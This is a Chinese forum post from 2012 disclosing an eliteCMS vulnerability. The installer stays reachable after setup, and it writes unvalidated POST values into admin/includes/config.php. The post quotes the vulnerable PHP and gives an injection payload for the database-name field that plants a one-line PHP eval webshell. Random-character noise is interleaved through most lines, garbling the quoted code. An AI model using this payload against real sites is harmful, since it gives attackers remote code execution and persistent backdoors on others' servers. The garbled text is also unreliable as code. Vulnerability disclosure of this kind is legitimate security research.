eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
4 r. ~8 h0 v. t) L
/ X' {. w8 U C" g5 a0 _另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php7 O6 F3 I/ {* C
我们来看代码:
; g. N1 f3 R3 B+ a) v 6 A" N+ ~7 v1 `* V
...8 U6 d% y0 J! [- f$ g/ s
elseif ($_GET['step'] == "4") {+ k" u+ a8 j7 V& a! C* J! X8 c. x) ^, I
$file = "../admin/includes/config.php";
- o. ?& K& l# O! T $write = "<?php\n";
7 b4 X1 D" _4 W $write .= "/**\n";* D. ^- Q: P9 O. D! ^5 d7 }
$write .= "*\n";
0 [6 O# F. D) g4 [ $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
1 t# s/ g9 v# m( u0 z& Z8 g9 ^; J...略...7 R2 ` F2 f0 P% E: V+ z' D: U
$write .= "*\n";2 e3 g1 R7 e* w V( r) ~* \/ T
$write .= "*/\n";# n' O" o+ r, X. e! |& A5 e T
$write .= "\n";
) Y9 W% Y% t" C- p; t $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";0 B7 f& [+ z' e. A
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
! U! L1 \' f6 ]6 G9 t $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";) A3 d! t% c1 a8 M3 V
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
# G/ X4 ^/ t* G4 s; E2 Z3 j $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";: R4 E7 r9 D( x( D: s, e0 h0 G
$write .= "if (!\$connection) {\n";! j! C. B+ O) d& K! a. U: [
$write .= " die(\"Database connection failed\" .mysql_error());\n";
( x# I6 T) b. v $write .= " \n";
5 ^/ S0 b! R7 A; J8 h $write .= "} \n";$ y2 J, R- C1 C+ C' A
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
, G0 e/ L& r+ J8 y' p $write .= "if (!\$db_select) {\n";
: K, H1 ?0 T& K" ]' Y7 ^: v8 c $write .= " die(\"Database select failed\" .mysql_error());\n";
[& f/ c- e9 G) h2 ^. c; E $write .= " \n";5 ^' e' o/ P! C4 v5 t8 U, N
$write .= "} \n";
( G. x& E% V: z% t, s0 [ $write .= "?>\n";
, t% `0 \! w4 D' U9 J3 l, I
2 R+ Q( R3 s# x9 O$ x $writer = fopen($file, 'w');) ^% d4 V: T+ o# U$ X
...: E& J( K) T7 N1 m, o
" F/ W3 V: x1 K
在看代码:" _1 N1 J3 K- z
! M: b( l' l! ]' t- F) Q0 ]9 G! y
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
+ L: a2 M, t; L" T# }; e$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
' k9 {* z; d% ~' `1 I. b$_SESSION['DB_USER'] = $_POST['DB_USER'];; f/ n3 ?" n" M( A8 O$ t0 X
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
- n4 f* O7 N# _* C/ H* [! r/ P ; n G0 `) M6 W1 S) T5 x$ T
取值未作任何验证; O3 v! ]; W, ?2 p! Y U# u) i; A2 X
如果将数据库名POST数据:
, O/ W3 p1 F0 F
6 e( U1 p; W1 j" W"?><?php eval($_POST[c]);?><?php
' D8 \. t& \- h1 v1 l
! i% D0 j+ ?, N ]5 |' L( Y, F' g将导致一句话后门写入/admin/includes/config.php- x6 @3 B) _- V F9 ^4 X
|
发表于 2012-11-18 13:59:27
收藏
支持
反对